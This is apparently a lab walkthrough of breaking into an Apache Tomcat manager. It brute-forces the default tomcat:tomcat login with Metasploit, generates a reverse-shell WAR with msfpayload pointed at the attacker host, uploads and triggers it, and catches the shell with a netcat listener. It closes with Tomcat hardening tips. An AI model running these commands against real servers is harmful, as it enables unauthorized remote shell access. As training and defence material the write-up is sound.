set RHOSTS 192.168.2.109
Metasploit, by default, has some options configured that we will need to change. First we will need to change the port to 8180.
set RPORT 8180
We also want to change the STOP_ON_SUCCESS value to true so that when we are successful, metasploit will stop brute forcing.
set STOP_ON_SUCCESS true
Normally when brute forcing something, you need to provide a file or list of usernames and passwords, but since metasploit is one bad mo fo, it provides a user and password file custom made for this auxiliary module located at
If you have not explored the wordlist directory or any thing else inside metasploit, I would highly recommend you do so because there are many useful things you will find.
Perfect. The user configured a *highly complex username and password tomcat:tomcat. Now we can head over to the respective web address and try to login. We will open firefox and type this into our browser.
Once we are logged in, we are presented with the web application manager interface. We were able to compromise the web application, but now we are wanting to be able to interact with the underlying operating system. Since we only have application layer access right now, we need to find a way to get the application to run some code for us. If we scroll down we can see a place where the interface allows us to upload a .War file.
After doing some research, I found out that .war are Web ARchive files that contain all the files needed for a Java based web application. Would it be possible for us to somehow create a backdoor we could upload in the form of a .War file, and then get the backdoor to execute?
Metasploit to the rescue, once again. Using msfpayload, we can create shellcode and then specify what type of file to send it to. It just so happens, that one of the filetypes that msfpayload supports is .war. If you are not familiar with msfpayload there are plenty of tutorials out there. Google is your friend.
msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.2.102 LPORT=1337 W > runme.war
/* Sidenote: for some reason, the linux/x86/shell/reverse_tcp metasploit payload would work and create a session, but would then drop the session due to an EOFError that looks like this:
[*] Command shell session 2 opened (192.168.2.102:1337 -> 192.168.2.109:33743) at 2011-11-01 17:30:42 -0400
[*] Command shell session 2 closed. Reason: Died from EOFError
Not really sure why it does this, mabye has something to do with the /shell/reverse_tcp form of payload being the type where it just opens network connection then waits for the rest of the payload from the attacker machine, and the /shell_reverse_tcp type has the entire thing put together. I will have to keep playing around with it.*\
Ok, now that we have our backdoor in a .war format, all we need to do now is upload the file to the manager and then navigate to the right webpage to execute it on the machine. Metasploit actually implements the same technique as an exploit, but I wanted to try and do it manually so that I could learn more about how it works since I do not know a lot about java web applications. You can find more about their built-in exploit here:
After a little more research, I found out that msfpayload creates a randomly named .jsp (javaserver page) file and it puts the payload in this page. We will need to figure out what the page is called to access it. Since a WAR file is just an archive of other files, lets unzip the war file so we can see the name of the .jsp file. We can use the unzip command and the -l flag just to see a list of the files.
unzip -l runme.war
Perfect. Now we know the filename. Before we navigate to the page, we need to set up a listener on the attacker machine to catch the reverse shell. We can use either the multi/handler in metasploit or just a basic netcat listener. Lets just do netcat.
nc -v -l -p 1337
Once this is done, we need to navigate to the .jsp file on the server to get it to execute and hopefully give us a shell. The manager application will, by default, put the files located inside the WAR archive in a directory under the archive name. So in my case it will be /runme/ajegupbyv.jsp
Awesome! We now have OS layer access on this server. At this point we would do some recon and try to escalate privileges if we wanted to further compromise this machine.
What can we learn from this attack about securing tomcat?
1) Never, Never, Never, Never use the freakin name of the application as the username AND/OR the password. Ever. It is simply way to easy to brute force. A complex username and password is a must for authentication integrity. An unusual username and password would make brute forcing much harder.
2) If you are going to have a manager application, you can filter who is allowed to request it by IP or by host name. If the filter was by subnet, it would not have necessarily prevented this specific attack, due to the fact that I am on the same subnet as the server, but if the filter only allowed certain IP's to connect, it would have made the attackers job that much harder.
3) Although not a solid security tactic, rename the manager application. This would not stop an attacker but would at least make life a little tougher for him.
For more information on security an install of tomcat, OWASP has put together a pretty good article here: